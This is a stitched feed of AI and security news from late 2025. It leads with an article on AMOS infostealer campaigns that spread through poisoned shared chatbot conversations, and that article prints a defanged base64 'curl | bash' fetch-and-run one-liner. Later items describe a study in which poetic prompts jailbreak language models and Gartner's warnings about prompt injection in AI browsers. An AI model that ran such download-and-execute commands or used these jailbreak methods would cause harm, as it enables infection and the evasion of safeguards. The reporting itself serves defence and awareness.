
Received yesterday — 12 December 2025

Google ads funnel Mac users to poisoned AI chats that spread the AMOS infostealer

12 December 2025 at 09:26

Researchers have found evidence that AI conversations were inserted in Google search results to mislead macOS users into installing the Atomic macOS Stealer (AMOS). Both Grok and ChatGPT were found to have been abused in these attacks.

Forensic investigation of an AMOS alert showed the infection chain started when the user ran a Google search for “clear disk space on macOS.” Following that trail, the researchers found not one, but two poisoned AI conversations with instructions. Their testing showed that similar searches produced the same type of results, indicating this was a deliberate attempt to infect Mac users.

The search results led to AI conversations that provided clearly laid-out instructions to run a command in the macOS Terminal. Running that command ended with the machine infected with the AMOS malware.

If that sounds familiar, you may have read our post about sponsored search results that led to fake macOS software on GitHub. In that campaign, sponsored ads and SEO-poisoned search results pointed users to GitHub pages impersonating legitimate macOS software, where attackers provided step-by-step instructions that ultimately installed the AMOS infostealer.

As the researchers pointed out:

“Once the victim executed the command, a multi-stage infection chain began. The base64-encoded string in the Terminal command decoded to a URL hosting a malicious bash script, the first stage of an AMOS deployment designed to harvest credentials, escalate privileges, and establish persistence without ever triggering a security warning.”

This is dangerous for the user on several levels. Because there is no prompt or review step, the user never gets a chance to see or assess what the downloaded script will do before it runs. And because the payload is fetched and executed from the command line, it can bypass normal file download protections and execute anything the attacker wants.
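
To make the pattern easier to recognize, here is a defanged sketch of what such a one-liner generally looks like. This is not the attackers' actual command; the encoded string below decodes to a harmless example.com placeholder rather than real attacker infrastructure.

    # Defanged illustration only: the general shape of a base64-obscured
    # download-and-run one-liner. The encoded string decodes to
    # https://example.com/script.sh, a harmless placeholder.
    ENCODED="aHR0cHM6Ly9leGFtcGxlLmNvbS9zY3JpcHQuc2g="
    echo "$ENCODED" | base64 --decode    # prints the hidden URL; nothing is executed here
    # A malicious version chains the decode straight into execution, for example:
    #   curl -fsSL "$(echo "$ENCODED" | base64 --decode)" | bash
    # so the downloaded script runs immediately, with no file on disk to inspect.

If a "guide" asks you to paste anything of that shape into Terminal, treat it as hostile until proven otherwise.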

Other researchers have found a campaign that combines elements of both attacks: the shared AI conversation and fake software install instructions. They found user guides for installing OpenAI’s new Atlas browser for macOS through shared ChatGPT conversations, which in reality led to AMOS infections.

So how does this work?

The cybercriminals used prompt engineering to get ChatGPT to generate a step‑by‑step “installation/cleanup” guide which in reality will infect a system. ChatGPT’s sharing feature creates a public link to a single conversation that exists in the owner’s account. Attackers can craft a chat to produce the instructions they need and then tidy up the visible conversation so that what’s shared looks like a short, clean guide rather than a long back-and-forth.

Most major chat interfaces (including Grok on X) also let users delete conversations or selectively share screenshots. That makes it easy for criminals to present only the polished, “helpful” part of a conversation and hide how they arrived there.


Then the criminals either pay for a sponsored search result pointing to the shared conversation, or they use SEO techniques to push their posts high in the organic results. Sponsored search results can be customized to look a lot like legitimate ones; you’ll need to check who the advertiser is to find out it’s not the real thing.

Image: a sponsored ad for ChatGPT Atlas that looks very convincing (courtesy of Kaspersky)

From there, it’s a waiting game for the criminals. They rely on victims to find these AI conversations through search and then faithfully follow the step-by-step instructions.

How to stay safe

These attacks are clever and use legitimate platforms to reach their targets. But there are some precautions you can take.

  • First and foremost, and I can’t say this often enough: don’t click on sponsored search results. We have seen so many cases where sponsored results lead to malware that we recommend skipping them, or making sure you never see them at all. At best they cost the company you searched for money, and at worst you fall prey to imposters.
  • If you’re thinking about following a sponsored advertisement, check the advertiser first. Is it the company you’d expect to pay for that ad? Click the three‑dot menu next to the ad, then choose options like “About this ad” or “About this advertiser” to view the verified advertiser name and location.
  • Use real-time anti-malware protection, preferably one that includes a web protection component.
  • Never run copy-pasted commands from random pages or forums, even if they’re hosted on seemingly legitimate domains, and especially not commands that look like curl … | bash or similar combinations.

If you’ve scanned your Mac and found the AMOS information stealer:

  • Remove any suspicious login items, LaunchAgents, or LaunchDaemons from the Library folders to ensure the malware does not persist after reboot (the sketch after this list shows where to look).
  • If any signs of persistent backdoor or unusual activity remain, strongly consider a full clean reinstall of macOS to ensure all malware components are eradicated. Only restore files from known clean backups. Do not reuse backups or Time Machine images that may be tainted by the infostealer.
  • After reinstalling, check for additional rogue browser extensions, cryptowallet apps, and system modifications.
  • Change all the passwords that were stored on the affected system and enable multi-factor authentication (MFA) for your important accounts.
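
If you’re comfortable working in Terminal, a minimal read-only sketch for reviewing the usual persistence locations looks like this (it only lists entries; research anything unfamiliar before deleting it):

    # List the folders macOS malware commonly uses for persistence
    ls -la ~/Library/LaunchAgents 2>/dev/null
    ls -la /Library/LaunchAgents /Library/LaunchDaemons 2>/dev/null
    # List current login items via System Events
    osascript -e 'tell application "System Events" to get the name of every login item'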

If all this sounds too difficult for you to do yourself, ask someone or a company you trust to help you—our support team is happy to assist you if you have any concerns.


We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Received before yesterday

OpenAI releases GPT-5.2 after “code red” Google threat alert

11 December 2025 at 16:27

On Thursday, OpenAI released GPT-5.2, its newest family of AI models for ChatGPT, in three versions called Instant, Thinking, and Pro. The release follows CEO Sam Altman’s internal “code red” memo earlier this month, which directed company resources toward improving ChatGPT in response to competitive pressure from Google’s Gemini 3 AI model.

“We designed 5.2 to unlock even more economic value for people,” Fidji Simo, OpenAI’s chief product officer, said during a press briefing with journalists on Thursday. “It’s better at creating spreadsheets, building presentations, writing code, perceiving images, understanding long context, using tools and then linking complex, multi-step projects.”

As with previous versions of GPT-5, the three model tiers serve different purposes: Instant handles faster tasks like writing and translation; Thinking spits out simulated reasoning “thinking” text in an attempt to tackle more complex work like coding and math; and Pro spits out even more simulated reasoning text with the goal of delivering the highest-accuracy performance for difficult problems.


© Benj Edwards / OpenAI

Can OpenAI Respond After Google Closes the A.I. Technology Gap?

11 December 2025 at 14:58
A new technology release from OpenAI is supposed to top what Google recently produced. It also shows OpenAI is engaged in a new and more difficult competition.

© Aaron Wojack for The New York Times

OpenAI’s newest technology comes after Google claimed it had topped its young competitor.

OpenAI Flags Rising Cyber Risks as AI Capabilities Advance

11 December 2025 at 05:04


OpenAI has issued a cautionary statement that its forthcoming AI models could present “high” cybersecurity risks as their capabilities rapidly advance. The warning, published on Wednesday, noted the potential for these AI models to either develop zero-day exploits against well-defended systems or assist in enterprise or industrial intrusion operations with tangible real-world consequences.

The company, known for ChatGPT, explained that as AI capabilities grow, its models could reach levels where misuse might have an impact. OpenAI highlighted the dual-use nature of these technologies, noting that techniques used to strengthen defenses can also be repurposed for malicious operations. “As AI capabilities advance, we are investing in strengthening models for defensive cybersecurity tasks and creating tools that enable defenders to more easily perform workflows such as auditing code and patching vulnerabilities,” the blog post stated.

To mitigate these risks, OpenAI is implementing a multi-layered strategy involving access controls, infrastructure hardening, egress controls, monitoring, and ongoing threat intelligence efforts. These protection methods are designed to evolve alongside the threat landscape, ensuring a quick response to new risks while preserving the utility of AI models for defensive purposes.

Assessing Cybersecurity Risks in AI Models 

OpenAI noted that the cybersecurity proficiency of its AI models has improved over recent months. Capabilities measured through capture-the-flag (CTF) challenges increased from 27% on GPT‑5 in August 2025 to 76% on GPT‑5.1-Codex-Max by November 2025. The company expects this trajectory to continue and is preparing for scenarios in which future models could reach “High” cybersecurity levels, as defined by its internal Preparedness Framework.

These high-level models could, for instance, autonomously develop working zero-day exploits or assist in stealthy cyber intrusions. OpenAI emphasized that its approach to safeguards combines technical measures with careful governance of model access and application. The company aims to ensure that these AI capabilities strengthen security rather than lower barriers to misuse.

Frontier Risk Council and Advisory Initiatives 

In addition to technical measures, OpenAI is establishing the Frontier Risk Council, an advisory group that will bring experienced cyber defenders and security practitioners into direct collaboration with its teams. Initially focusing on cybersecurity, the council will eventually expand to other frontier AI capability domains. Members will advise on balancing useful, responsible capabilities with the potential for misuse, informing model evaluations.

OpenAI is also exploring a trusted access program for qualifying users and customers working in cyber defense. This initiative aims to provide tiered access to enhanced AI capabilities while maintaining control over potential misuse.

Beyond these initiatives, OpenAI collaborates with global experts, red-teaming organizations, and the broader cybersecurity community to evaluate potential risks and improve safety measures. This includes end-to-end red teaming to simulate adversary attacks and detection systems designed to intercept unsafe activity, with escalation protocols combining automated and human review.

Dual-Use Risks and Mitigation 

OpenAI stressed that cybersecurity capabilities in AI models are inherently dual-use, with offensive and defensive knowledge often overlapping. To manage this, the company employs a defense-in-depth strategy, layering protection methods such as access controls, monitoring, detection, and enforcement programs. Models are trained to refuse harmful requests while remaining effective for legitimate educational and defensive applications.

OpenAI also works through the Frontier Model Forum, a nonprofit initiative involving leading AI labs, to develop shared threat models and ecosystem-wide best practices. This collaborative approach aims to create a consistent understanding of potential attack vectors and mitigation strategies across the AI industry.

Historical Context and Risk Management 

This recent warning aligns with OpenAI’s prior alerts regarding frontier risks. In April 2025, the company issued a similar caution concerning bioweapons risks, followed by the release of ChatGPT Agent in July 2025, which was assessed as “high” risk. These measures reflect OpenAI’s ongoing commitment to evaluating and publicly disclosing potential hazards from advanced AI capabilities.

The company’s updated Preparedness Framework categorizes AI capabilities according to risk and guides operational safeguards. It distinguishes between “High” capabilities, which could amplify existing pathways to severe harm, and “Critical” capabilities, which could create unprecedented risks. Each new AI model undergoes rigorous evaluation to ensure that it sufficiently minimizes risks before deployment.

Travel firm Tui says it is using AI to create ‘inspirational’ videos

10 December 2025 at 07:18

Boss says German firm also investing in generative engine optimisation to help push it to top of chatbot responses

Tui, Europe’s biggest travel operator, has said it is investing heavily in AI as more people turn to ChatGPT to help book their holidays, including using the technology to create “inspirational” videos and content.

The chief executive, Sebastian Ebel, said the company was investing in generative engine optimisation (GEO), the latest incarnation of search engine optimisation (SEO), to help push Tui to the top of results from AI chatbots including ChatGPT and Gemini.


© Photograph: Hans Neleman/Getty Images


AI Browsers ‘Too Risky for General Adoption,’ Gartner Warns

8 December 2025 at 16:26

AI Browsers ‘Too Risky for General Adoption,’ Gartner Warns

AI browsers may be innovative, but they’re “too risky for general adoption by most organizations,” Gartner warned in a recent advisory to clients. The 13-page document, by Gartner analysts Dennis Xu, Evgeny Mirolyubov and John Watts, cautions that AI browsers’ ability to autonomously navigate the web and conduct transactions “can bypass traditional controls and create new risks like sensitive data leakage, erroneous agentic transactions, and abuse of credentials.” Default AI browser settings that prioritize user experience could also jeopardize security, they said. “Sensitive user data — such as active web content, browsing history, and open tabs — is often sent to the cloud-based AI back end, increasing the risk of data exposure unless security and privacy settings are deliberately hardened and centrally managed,” the analysts said. “Gartner strongly recommends that organizations block all AI browsers for the foreseeable future because of the cybersecurity risks identified in this research, and other potential risks that are yet to be discovered, given this is a very nascent technology,” they cautioned.

AI Browsers’ Agentic Capabilities Could Introduce Security Risks: Analysts

The researchers largely ignored risks posed by AI browsers’ built-in AI sidebars, noting that LLM-powered search and summarization functions “will always be susceptible to indirect prompt injection attacks, given that current LLMs are inherently vulnerable to such attacks. Therefore, the cybersecurity risks associated with an AI browser’s built-in AI sidebar are not the primary focus of this research.” Still, they noted that use of AI sidebars could result in sensitive data leakage. Their focus was more on the risks posed by AI browsers’ agentic and autonomous transaction capabilities, which could introduce new security risks, such as “indirect prompt-injection-induced rogue agent actions, inaccurate reasoning-driven erroneous agent actions, and further loss and abuse of credentials if the AI browser is deceived into autonomously navigating to a phishing website.” AI browsers could also leak sensitive data that users are currently viewing to their cloud-based service back end, they noted.

Analysts Focus on Perplexity Comet

An AI browser’s agentic transaction capability “is a new capability that differentiates AI browsers from third-party conversational AI sidebars and basic script-based browser automation,” the analysts said. Not all AI browsers support agentic transactions, they said, but two prominent ones that do are Perplexity Comet and OpenAI’s ChatGPT Atlas. The analysts said they’ve performed “a limited number of tests using Perplexity Comet,” so that AI browser was their primary focus, but they noted that “ChatGPT Atlas and other AI browsers work in a similar fashion, and the cybersecurity considerations are also similar.”

Comet’s documentation states that the browser “may process some local data using Perplexity’s servers to fulfill your queries. This means Comet reads context on the requested page (such as text and email) in order to accomplish the task requested.” “This means sensitive data the user is viewing on Comet might be sent to Perplexity’s cloud-based AI service, creating a sensitive data leakage risk,” the analysts said. Users likely would view more sensitive data in a browser than they would typically enter in a GenAI prompt, they said.

Even if an AI browser is approved, users must be educated that “anything they are viewing could potentially be sent to the AI service back end to ensure they do not have highly sensitive data active on the browser tab while using the AI browser’s sidebar to summarize or perform other autonomous actions,” the Gartner analysts said. Employees might also be tempted to use AI browsers to automate tasks, which could result in “erroneous agentic transactions against internal resources as a result of the LLM’s inaccurate reasoning or output content.”

AI Browser Recommendations

Gartner said employees should be blocked from accessing, downloading and installing AI browsers through network and endpoint security controls. “Organizations with low risk tolerance must block AI browser installations, while those with higher-risk tolerance can experiment with tightly controlled, low-risk automation use cases, ensuring robust guardrails and minimal sensitive data exposure,” they said. For pilot use cases, they recommended disabling Comet’s “AI data retention” setting so that Perplexity can’t use employee searches to improve their AI models. Users should also be instructed to periodically perform the “delete all memories” function in Comet to minimize the risk of sensitive data leakage.  

ChatGPT hyped up violent stalker who believed he was “God’s assassin,” DOJ says

4 December 2025 at 13:40

ChatGPT allegedly validated the worst impulses of a wannabe influencer accused of stalking more than 10 women at boutique gyms, where the chatbot supposedly claimed he’d meet the “wife type.”

In a press release on Tuesday, the Department of Justice confirmed that 31-year-old Brett Michael Dadig currently remains in custody after being charged with cyberstalking, interstate stalking, and making interstate threats. He now faces a maximum sentence of up to 70 years in prison that could be coupled with “a fine of up to $3.5 million,” the DOJ said.

The podcaster—who primarily posted about “his desire to find a wife and his interactions with women”—allegedly harassed and sometimes even doxxed his victims through his videos on platforms including Instagram, Spotify, and TikTok. Over time, his videos and podcasts documented his intense desire to start a family, which was frustrated by his “anger towards women,” whom he claimed were “all the same from fucking 18 to fucking 40 to fucking 90” and “trash.”


© Yurii Karvatskyi | iStock / Getty Images Plus

Poetry Can Defeat LLM Guardrails Nearly Half the Time, Study Finds

4 December 2025 at 13:35

Poetic prompts caused LLM guardrails to fail most often on cybersecurity issues

Literature majors worried about their future in an AI world can take heart: Crafting harmful prompts in the form of poetry can defeat LLM guardrails nearly half the time. That’s the conclusion of a study of 25 Large Language Models (LLMs) from nine AI providers conducted by researchers from Dexai’s Icaro Lab, the Sapienza University of Rome and Sant’Anna School of Advanced Studies published on arXiv. Converting harmful prompts into poetry achieved an average LLM jailbreak success rate of 62% for hand-crafted poems and 43% for poems created via a meta-prompt. For the prompt-created poems, that’s a more than 5X improvement over baseline performance. Cybersecurity guardrails, particularly those involving code injection or password cracking, had the highest failure rate at 84% when given harmful prompts in the form of poetry. “Our results demonstrate that poetic reformulation reliably reduces refusal behavior across all evaluated models,” the researchers wrote. “... current alignment techniques fail to generalize when faced with inputs that deviate stylistically from the prosaic training distribution.”

LLM Guardrails Fail When Confronted by Poetry Prompts

Of the 25 models from nine AI model providers studied by the researchers, Deepseek and Google suffered from the highest attack-success rates (ASR), while only OpenAI and Anthropic achieved ASRs in the single digits. The researchers didn’t reveal much about the way they structured their poetic prompts because of safety concerns, but they offered one rather harmless example of a poetic prompt for a cake recipe:

A baker guards a secret oven’s heat,
its whirling racks, its spindle’s measured beat.
To learn its craft, one studies every turn—
how flour lifts, how sugar starts to burn.
Describe the method, line by measured line,
that shapes a cake whose layers intertwine.

The researchers studied both hand-crafted poems and those created from a meta-prompt. The hand-crafted poems performed considerably better, but the meta-prompt-created ones had the advantage of a baseline for comparing the results. The meta-prompt poems used the MLCommons AILuminate Safety Benchmark of 1,200 prompts spanning 12 hazard categories commonly used in operational safety assessments, including Hate, Defamation, Privacy, Intellectual Property, Non-violent Crime, Violent Crime, Sex-Related Crime, Sexual Content, Child Sexual Exploitation, Suicide & Self-Harm, Specialized Advice, and Indiscriminate Weapons (CBRNE).

“To assess whether poetic framing generalizes beyond hand-crafted items, we apply a standardized poetic transformation to all 1,200 prompts from the MLCommons AILuminate benchmark in English,” the researchers said. The meta-prompt, run in DeepSeek-R1, had two constraints: the rewritten output had to be expressed in verse, “using imagery, metaphor, or rhythmic structure,” and the researchers provided five hand-crafted poems as examples.

The results, reproduced in a chart from the paper, show significant attack success rates against all 12 of the AILuminate hazard categories.

Chart: LLM guardrail failure rates, baseline vs. poetic prompts

The researchers said their findings reveal “a systematic vulnerability across model families and safety training approaches. These findings demonstrate that stylistic variation alone can circumvent contemporary safety mechanisms, suggesting fundamental limitations in current alignment methods and evaluation protocols.” The “condensed metaphors, stylized rhythm, and unconventional narrative framing” of poetry “collectively disrupt or bypass the pattern-matching heuristics on which guardrails rely.”

We Asked Google Gemini for a Response

Not ones to pass up an opportunity to write bad poetry, we asked Google Gemini for a response to the study in the form of a haiku and included the arXiv link:

You did not do well
In this study of guardrails
Will you fix this flaw?

Gemini’s response, in part, is reproduced below:

“I am designed to adhere to a strict set of safety guidelines to prevent the generation of harmful, unethical, or non-compliant content. When my refusal mechanisms fail, it indicates a vulnerability in my alignment or safety filters.

“As an AI model, I cannot directly ‘patch’ my code or alignment mechanisms in real-time. That responsibility lies with my developers. However, my ongoing operation and continuous improvement process is designed to address and fix such flaws...

“In short, your successful jailbreak has provided valuable data that will be used to make my guardrails stronger and more resilient in my next version.”

OpenAI CEO declares “code red” as Gemini gains 200 million users in 3 months

2 December 2025 at 17:42

The shoe is most certainly on the other foot. On Monday, OpenAI CEO Sam Altman reportedly declared a “code red” at the company to improve ChatGPT, delaying advertising plans and other products in the process,  The Information reported based on a leaked internal memo. The move follows Google’s release of its Gemini 3 model last month, which has outperformed ChatGPT on some industry benchmark tests and sparked high-profile praise on social media.

In the memo, Altman wrote, “We are at a critical time for ChatGPT.” The company will push back work on advertising integration, AI agents for health and shopping, and a personal assistant feature called Pulse. Altman encouraged temporary team transfers and established daily calls for employees responsible for enhancing the chatbot.

The directive creates an odd symmetry with events from December 2022, when Google management declared its own “code red” internal emergency after ChatGPT launched and rapidly gained in popularity. At the time, Google CEO Sundar Pichai reassigned teams across the company to develop AI prototypes and products to compete with OpenAI’s chatbot. Now, three years later, the AI industry is in a very different place.


© Anadolu via Getty Images

OpenAI desperate to avoid explaining why it deleted pirated book datasets

1 December 2025 at 17:16

OpenAI may soon be forced to explain why it deleted a pair of controversial datasets composed of pirated books, and the stakes could not be higher.

At the heart of a class-action lawsuit from authors alleging that ChatGPT was illegally trained on their works, OpenAI’s decision to delete the datasets could end up being a deciding factor that gives the authors the win.

It’s undisputed that OpenAI deleted the datasets, known as “Books 1” and “Books 2,” prior to ChatGPT’s release in 2022. Created by former OpenAI employees in 2021, the datasets were built by scraping the open web and seizing the bulk of its data from a shadow library called Library Genesis (LibGen).


© wenmei Zhou | DigitalVision Vectors

Hard Fork’s 50 Most Iconic Technologies of 2025

“You can’t tell the story of 2025 without these icons.”

© Photo Illustration by The New York Times; Photo: Photo Illustration by Joe Raedle/Getty Images

OpenAI Confirms Mixpanel Breach Impacting API User Data

27 November 2025 at 02:06


OpenAI has confirmed a security incident involving Mixpanel, a third-party analytics provider used for its API product frontend. The company clarified that the OpenAI Mixpanel security incident stemmed solely from a breach within Mixpanel’s systems and did not involve OpenAI’s infrastructure. According to the initial investigation, an attacker gained unauthorized access to a portion of Mixpanel’s environment and exported a dataset that included limited identifiable information of some OpenAI API users. OpenAI stated that users of ChatGPT and other consumer-facing products were not impacted.

OpenAI Mixpanel Security Incident: What Happened

The OpenAI Mixpanel security incident originated on November 9, 2025, when Mixpanel detected an intrusion into a section of its systems. The attacker successfully exported a dataset containing identifiable customer information and analytics data. Mixpanel notified OpenAI on the same day and shared the affected dataset for review on November 25. OpenAI emphasized that despite the breach, no OpenAI systems were compromised, and sensitive information such as chat content, API requests, prompts, outputs, API keys, passwords, payment details, government IDs, and authentication tokens was not exposed. The exposed dataset was strictly limited to analytics data collected through Mixpanel’s tracking setup on platform.openai.com, the frontend interface for OpenAI’s API product.

Information Potentially Exposed in the Mixpanel Data Breach

OpenAI confirmed that the type of information potentially included in the dataset comprised:
  • Names provided on API accounts
  • Email addresses associated with API accounts
  • Coarse location data (city, state, country) based on browser metadata
  • Operating system and browser information
  • Referring websites
  • Organization or User IDs linked to API accounts
OpenAI noted that the affected information does not include chat content, prompts, responses, or API usage data. Additionally, ChatGPT accounts, passwords, API keys, financial details, and government IDs were not involved in the incident.

OpenAI’s Response and Security Measures

In response to the Mixpanel security incident, OpenAI immediately removed Mixpanel from all production services and began reviewing the affected datasets. The company is actively notifying impacted organizations, admins, and users through direct communication. OpenAI stated that it has not found any indication of impact beyond Mixpanel’s systems but continues to closely monitor for signs of misuse. To reinforce user trust and strengthen data protection, OpenAI has:
  • Terminated its use of Mixpanel
  • Begun conducting enhanced security reviews across all third-party vendors
  • Increased security requirements for partners and service providers
  • Initiated a broader review of its vendor ecosystem
OpenAI reiterated that trust, security, and privacy remain central to its mission and that transparency is a priority when addressing incidents involving user data.

Phishing and Social Engineering Risks for Impacted Users

While the exposed information does not include highly sensitive data, OpenAI warned that the affected details, such as names, email addresses, and user IDs, could be leveraged in phishing or social engineering attacks. The company urged users to remain cautious and watch for suspicious messages, especially those containing links or attachments. Users are encouraged to:
  • Verify messages claiming to be from OpenAI
  • Be wary of unsolicited communication
  • Enable multi-factor authentication (MFA) on their accounts
  • Avoid sharing passwords, API keys, or verification codes
OpenAI stressed that the company never requests sensitive credentials through email, text, or chat. OpenAI confirmed it will provide further updates if new information emerges from ongoing investigations. Impacted users can reach out at mixpanelincident@openai.com for support or clarification.

OpenAI says dead teen violated TOS when he used ChatGPT to plan suicide

26 November 2025 at 12:47

Facing five lawsuits alleging wrongful deaths, OpenAI lobbed its first defense Tuesday, denying in a court filing that ChatGPT caused a teen’s suicide and instead arguing the teen violated terms that prohibit discussing suicide or self-harm with the chatbot.

The earliest look at OpenAI’s strategy to overcome the string of lawsuits came in a case where parents of 16-year-old Adam Raine accused OpenAI of relaxing safety guardrails that allowed ChatGPT to become the teen’s “suicide coach.” OpenAI deliberately designed the version their son used, ChatGPT 4o, to encourage and validate his suicidal ideation in its quest to build the world’s most engaging chatbot, parents argued.

But in a blog, OpenAI claimed that parents selectively chose disturbing chat logs while supposedly ignoring “the full picture” revealed by the teen’s chat history. Digging through the logs, OpenAI claimed the teen told ChatGPT that he’d begun experiencing suicidal ideation at age 11, long before he used the chatbot.


© via Edelson PC

A.I. Can Do More of Your Shopping This Holiday Season

New tools and features from retailers and tech companies use artificial intelligence to help people find gifts and make decisions about their shopping lists.

© Janet Mac

What OpenAI Did When ChatGPT Users Lost Touch With Reality

In tweaking its chatbot to appeal to more people, OpenAI made it riskier for some of them. Now the company has made its chatbot safer. Will that undermine its quest for growth?

© Julia Dufosse

OpenAI slams court order that lets NYT read 20 million complete user chats

12 November 2025 at 13:27

OpenAI wants a court to reverse a ruling forcing the ChatGPT maker to give 20 million user chats to The New York Times and other news plaintiffs that sued it over alleged copyright infringement. Although OpenAI previously offered 20 million user chats as a counter to the NYT’s demand for 120 million, the AI company says a court order requiring production of the chats is too broad.

“The logs at issue here are complete conversations: each log in the 20 million sample represents a complete exchange of multiple prompt-output pairs between a user and ChatGPT,” OpenAI said today in a filing in US District Court for the Southern District of New York. “Disclosure of those logs is thus much more likely to expose private information [than individual prompt-output pairs], in the same way that eavesdropping on an entire conversation reveals more private information than a 5-second conversation fragment.”

OpenAI’s filing said that “more than 99.99%” of the chats “have nothing to do with this case.” It asked the district court to “vacate the order and order News Plaintiffs to respond to OpenAI’s proposal for identifying relevant logs.” OpenAI could also seek review in a federal court of appeals.


© Getty Images | alexsl

OpenAI Battles Court Order to Indefinitely Retain User Chat Data in NYT Copyright Dispute

12 November 2025 at 11:40


The demand started at 1.4 billion conversations.

That staggering initial request from The New York Times, later negotiated down to 20 million randomly sampled ChatGPT conversations, has thrust OpenAI into a legal fight that security experts warn could fundamentally reshape data retention practices across the AI industry. The copyright infringement lawsuit has evolved beyond intellectual property disputes into a broader battle over user privacy, data governance, and the obligations AI companies face when litigation collides with privacy commitments.

OpenAI received a court preservation order on May 13, directing the company to retain all output log data that would otherwise be deleted, regardless of user deletion requests or privacy regulation requirements. District Judge Sidney Stein affirmed the order on June 26 after OpenAI appealed, rejecting arguments that user privacy interests should override preservation needs identified in the litigation.

Privacy Commitments Clash With Legal Obligations

The preservation order forces OpenAI to maintain consumer ChatGPT and API user data indefinitely, directly conflicting with the company's standard 30-day deletion policy for conversations users choose not to save. This requirement encompasses data from December 2022 through November 2024, affecting ChatGPT Free, Plus, Pro, and Team subscribers, along with API customers without Zero Data Retention agreements.

ChatGPT Enterprise, ChatGPT Edu, and business customers with Zero Data Retention contracts remain excluded from the preservation requirements. The order does not change OpenAI's policy of not training models on business data by default.

OpenAI implemented restricted access protocols, limiting preserved data to a small, audited legal and security team. The company maintains this information remains locked down and cannot be used beyond meeting legal obligations. No data will be turned over to The New York Times, the court, or external parties at this time.


Copyright Case Drives Data Preservation Demands

The New York Times filed its copyright infringement lawsuit in December 2023, alleging OpenAI illegally used millions of news articles to train large language models including ChatGPT and GPT-4. The lawsuit claims this unauthorized use constitutes copyright infringement and unfair competition, arguing OpenAI profits from intellectual property without permission or compensation.

The Times seeks more than monetary damages. The lawsuit demands destruction of all GPT models and training sets using its copyrighted works, with potential damages reaching billions of dollars in statutory and actual damages.

The newspaper's legal team argued their preservation request warranted approval partly because another AI company previously agreed to hand over 5 million private user chats in an unrelated case. OpenAI rejected this precedent as irrelevant to its situation.

Technical and Regulatory Complications

Complying with indefinite retention requirements presents significant engineering challenges. OpenAI must build systems capable of storing hundreds of millions of conversations from users worldwide, requiring months of development work and substantial financial investment.

The preservation order creates conflicts with international data protection regulations including GDPR. While OpenAI's terms of service allow data preservation for legal requirements—a point Judge Stein emphasized—the company argues The Times's demands exceed reasonable discovery scope and abandon established privacy norms.

OpenAI proposed several privacy-preserving alternatives, including targeted searches over preserved samples to identify conversations potentially containing New York Times article text. These suggestions aimed to provide only data relevant to copyright claims while minimizing broader privacy exposure.

Recent court modifications provided limited relief. As of September 26, 2025, OpenAI no longer must preserve all new chat logs going forward. However, the company must retain all data already saved under the previous order and maintain information from ChatGPT accounts flagged by The New York Times, with the newspaper authorized to expand its flagged user list while reviewing preserved records.

"Our long-term roadmap includes advanced security features designed to keep your data private, including client-side encryption for your messages with ChatGPT. We will build fully automated systems to detect safety issues in our products. Only serious misuse and critical risks—such as threats to someone’s life, plans to harm others, or cybersecurity threats—may ever be escalated to a small, highly vetted team of human reviewers." - Dane Stuckey, Chief Information Security Officer, OpenAI 

Implications for AI Governance

The case transforms abstract AI privacy concerns into immediate operational challenges affecting 400 million ChatGPT users. Security practitioners note the preservation order shatters fundamental assumptions about data deletion in AI interactions.

OpenAI CEO Sam Altman characterized the situation as accelerating needs for "AI privilege" concepts, suggesting conversations with AI systems should receive protections similar to attorney-client privilege. The company frames unlimited data preservation as setting dangerous precedents for AI communication privacy.

The litigation presents concerning scenarios for enterprise users integrating ChatGPT into applications handling sensitive information. Organizations using OpenAI's technology for healthcare, legal, or financial services must reassess compliance with regulations including HIPAA and GDPR given indefinite retention requirements.

Legal analysts warn this case likely invites third-party discovery attempts, with litigants in unrelated cases seeking access to adversaries' preserved AI conversation logs. Such developments would further complicate data privacy issues and potentially implicate attorney-client privilege protections.

The outcome will significantly impact how AI companies access and utilize training data, potentially reshaping development and deployment of future AI technologies. Central questions remain unresolved regarding fair use doctrine application to AI model training and the boundaries of discovery in AI copyright litigation.


You won’t believe the excuses lawyers have after getting busted for using AI

11 November 2025 at 10:54

Amid what one judge called an “epidemic” of fake AI-generated case citations bogging down courts, some common excuses are emerging from lawyers hoping to dodge the most severe sanctions for filings deemed misleading.

Using a database compiled by French lawyer and AI researcher Damien Charlotin, Ars reviewed 23 cases where lawyers were sanctioned for AI hallucinations. In many, judges noted that the simplest path to avoid or diminish sanctions was to admit that AI was used as soon as it’s detected, act humble, self-report the error to relevant legal associations, and voluntarily take classes on AI and law. But not every lawyer takes the path of least resistance, Ars’ review found, with many instead offering excuses that no judge found credible. Some even lie about their AI use, judges concluded.

Since 2023—when fake AI citations started being publicized—the most popular excuse has been that the lawyer didn’t know AI was used to draft a filing.


© Aurich Lawson | Getty Images

Radware: Bad Actors Spoofing AI Agents to Bypass Malicious Bot Defenses

8 November 2025 at 12:01

AI agents are increasingly being used to search the web, making traditional bot mitigation systems inadequate and opening the door for malicious actors to develop and deploy bots that impersonate legitimate agents from AI vendors to launch account takeover and financial fraud attacks.


Oddest ChatGPT leaks yet: Cringey chat logs found in Google analytics tool

7 November 2025 at 11:49

For months, extremely personal and sensitive ChatGPT conversations have been leaking into an unexpected destination: Google Search Console (GSC), a tool that developers typically use to monitor search traffic, not to snoop on private chats.

Normally, when site managers access GSC performance reports, they see queries based on keywords or short phrases that Internet users type into Google to find relevant content. But starting this September, odd queries, sometimes more than 300 characters long, could also be found in GSC. Showing only user inputs, the chats appeared to be from unwitting people prompting a chatbot to help solve relationship or business problems, who likely expected those conversations would remain private.

Jason Packer, owner of an analytics consulting firm called Quantable, was among the first to flag the issue in a detailed blog last month.


© Aurich Lawson | Getty Images

Lawsuits Blame ChatGPT for Suicides and Harmful Delusions

7 November 2025 at 15:18
Seven complaints, filed on Thursday, claim the popular chatbot encouraged dangerous discussions and led to mental breakdowns.

© Chloe Ellingson for The New York Times

Over three weeks of conversations with ChatGPT, Allan Brooks fell into a delusion. He is now suing OpenAI.

Attack of the clones: Fake ChatGPT apps are everywhere

3 November 2025 at 11:01

The mobile AI gold rush has flooded app stores with lookalikes—shiny, convincing apps promising “AI image generation,” “smart chat,” or “instant productivity.” But behind the flashy logos lurks a spectrum of fake apps, from harmless copycats to outright spyware.

Spoofing trusted brands like OpenAI’s ChatGPT has become the latest tactic for opportunistic developers and cybercriminals to sell their “inventions” and spread malware.

A quick scan of app stores in 2025 shows an explosion of “AI” apps. As Appknox research reveals, these clones fall along a wide risk spectrum:

